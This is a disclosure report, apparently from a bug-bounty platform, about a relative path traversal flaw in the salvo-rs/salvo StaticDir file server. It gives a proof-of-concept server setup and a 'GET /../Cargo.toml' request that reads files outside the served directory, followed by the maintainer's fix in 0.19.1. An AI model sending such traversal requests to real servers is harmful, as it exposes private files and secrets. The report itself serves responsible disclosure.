Relative Path Traversal vulnerability in StaticDir server in salvo-rs/salvo

Valid

Reported on

Apr 17th 2022

Description

There is a relative path traversal vulnerability in the serve module of the extra crate. An attacker can simply request a relative path and access files outside of the configured directory root.

Proof of Concept

With a static folder in the project directory:

// main.rs
use salvo::extra::serve::{Options, StaticDir};
use salvo::prelude::*;

#[tokio::main]
async fn main() {
    let router = Router::with_path("<**path>")
        .get(StaticDir::width_options(vec!["static"], Options::default()));

    Server::new(TcpListener::bind("0.0.0.0:7878"))
        .serve(router)
        .await;
}

Example attack request:

GET /../Cargo.toml HTTP/1.1
Host: localhost

This serves the Cargo.toml file in the project directory, which is outside the static directory.

Impact

This vulnerability is capable of accessing any file on a server running Salvo.

We are processing your report and will contact the salvo-rs/salvo team within 24 hours. a year ago

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago

We have contacted a member of the salvo-rs/salvo team and are waiting to hear back a year ago

A salvo-rs/salvo maintainer

commented a year ago

Tanks for your work, I have published a new version to fix this issue.

A salvo-rs/salvo maintainer validated this vulnerability a year ago

William Henderson has been awarded the disclosure bounty

The fix bounty is now up for grabs

A salvo-rs/salvo maintainer marked this as fixed in 0.19.1 with commit 54815c a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation